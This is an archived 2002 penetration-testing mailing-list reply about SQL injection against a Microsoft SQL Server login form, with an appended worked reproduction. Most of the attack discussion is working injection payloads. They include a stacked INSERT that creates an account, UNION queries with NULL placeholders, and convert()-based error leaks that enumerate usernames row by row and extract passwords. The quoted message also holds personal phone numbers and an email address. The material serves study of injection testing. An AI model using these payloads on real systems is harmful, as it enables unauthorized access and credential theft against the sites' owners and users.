----- Original Message -----
From: "Gary O'leary-Steele" <GaryO@sec-1.com>
To: <pen-testat_private>
Sent: Thursday, May 09, 2002 12:47 PM
Subject: sql table data enumeration help please.

> www.target.comUserName='insert into
> tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,Appointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address2,postcode,Homephone,UserAccess)
> values ('Oct 31 2000 8:52PM','7654','Oct 31 2000 8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gary','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',01131234567','sig','123','456','ls287sr','01132297541',1)--

Did you get an error message of some kind? Try using a semicolon after the username close quote and doing the INSERT in its own line.

> In an attempt to gain access to data held with the username and password
> fields I have tried
>
> www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
> tblusers where username >'a'--&password=hacker
>
> but get "Operand type clash: uniqueidentifier is incompatible with int"

This usually means that the column that you have used to inject (the ninth, in this case) is an int column in the original SELECT statement. The UNION SELECT column must have the same data type.

Try using the convert() hack to get around this whole issue, like this:

username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM tblUsers WHERE Username > 'a')) + ''--

You should get an error message back complaining about type conversion, which includes the returned value from your subselect.

Kevin.
SPI Dynamics, Inc.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service.
For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
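The two failures discussed above, reproduced on a throwaway table. This is an added example, not code from the thread or from either poster: the table, its column types and the login query are assumptions modelled on the column names Gary posted (the thread never shows the application's real query), and the error text is Microsoft SQL Server 2005+ wording (SQL Server 2000 phrases errors 206 and 245 differently). It goes slightly beyond Kevin's reply in two places: NULL placeholders for the UNION, so the clashing column type need not be known, and a prefix marker for convert() so that a value that happens to be numeric still leaks.

```sql
-- Added example (not from the original thread). tblUsers here is an assumed
-- cut-down version of Gary's table; its first column is a uniqueidentifier,
-- the column type named in the error he quoted.
CREATE TABLE tblUsers (
    UserID   uniqueidentifier NOT NULL DEFAULT NEWID(),
    UserName varchar(50)      NOT NULL,
    Password varchar(50)      NOT NULL
);
INSERT INTO tblUsers (UserName, Password) VALUES ('admin', 'Winter2002');
INSERT INTO tblUsers (UserName, Password) VALUES ('gary',  'test');
INSERT INTO tblUsers (UserName, Password) VALUES ('zoe',   '1234');

-- Assumed login query, built by string concatenation:
--   SELECT UserID, UserName, Password FROM tblUsers
--   WHERE UserName = '<UserName>' AND Password = '<password>'
-- Each statement below is that query with an injected UserName; the tail
-- after the injected -- is the application's own text, now commented out.

-- 1. Stacked INSERT (Kevin's first suggestion): close the quote, end the
--    SELECT with a semicolon, and run the INSERT as its own statement.
SELECT UserID, UserName, Password FROM tblUsers
WHERE UserName = ''; INSERT INTO tblUsers (UserName, Password) VALUES ('attacker', 'attacker')--' AND Password = 'hacker'

-- 2. A UNION with integer placeholders, as in Gary's query. int outranks
--    uniqueidentifier in type precedence, so SQL Server tries to convert
--    UserID to int and rejects the batch at bind time, before any row returns:
--    Msg 206: Operand type clash: uniqueidentifier is incompatible with int
SELECT UserID, UserName, Password FROM tblUsers
WHERE UserName = '' UNION SELECT 1, 1, MIN(UserName) FROM tblUsers WHERE UserName > 'a'--' AND Password = 'hacker'

-- 3. Same UNION with NULL placeholders. NULL unions with any column type, so
--    you need not know which position holds the uniqueidentifier. MIN() is
--    deterministic; TOP 1 without ORDER BY is not.
SELECT UserID, UserName, Password FROM tblUsers
WHERE UserName = '' UNION SELECT NULL, MIN(UserName), NULL FROM tblUsers WHERE UserName > 'a'--' AND Password = 'hacker'
-- returns one row: NULL, admin, NULL

-- 4. Kevin's convert() trick, in the "AND 1 = convert(...)" comparison form
--    rather than his string-concatenation form; both rely on the same failed
--    conversion, and the error quotes the value that could not be converted:
--    Msg 245: Conversion failed when converting the varchar value 'admin' to data type int.
SELECT UserID, UserName, Password FROM tblUsers
WHERE UserName = 'invalidusername' AND 1 = convert(int, (SELECT MIN(UserName) FROM tblUsers WHERE UserName > 'a'))--' AND Password = 'hacker'

-- 5. Enumerate the table one row per request by feeding the last leaked value
--    back into the WHERE clause:
--      WHERE UserName > 'admin'  ->  Msg 245 ... varchar value 'gary' ...
--      WHERE UserName > 'gary'   ->  Msg 245 ... varchar value 'zoe' ...
--      WHERE UserName > 'zoe'    ->  MIN() over no rows is NULL, NULL converts
--                                    to int cleanly, no error: end of table.
SELECT UserID, UserName, Password FROM tblUsers
WHERE UserName = 'invalidusername' AND 1 = convert(int, (SELECT MIN(UserName) FROM tblUsers WHERE UserName > 'admin'))--' AND Password = 'hacker'

-- 6. Pull a password for a user found in step 5. A value that happens to be
--    numeric ('1234') converts without error and leaks nothing, so prefix a
--    non-numeric marker to force the failure:
--    Msg 245: Conversion failed when converting the varchar value '~1234' to data type int.
SELECT UserID, UserName, Password FROM tblUsers
WHERE UserName = 'invalidusername' AND 1 = convert(int, (SELECT '~' + Password FROM tblUsers WHERE UserName = 'zoe'))--' AND Password = 'hacker'

DROP TABLE tblUsers;
```

Run each statement on its own against a scratch database and you get the error named in its comment. Steps 4 to 6 only work because the application in the thread echoes the database error to the page; behind a generic error page the same convert() payloads fail silently and the enumeration has to move to a blind technique instead.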
This archive was generated by hypermail 2b30 : Fri May 10 2002 - 09:07:19 PDT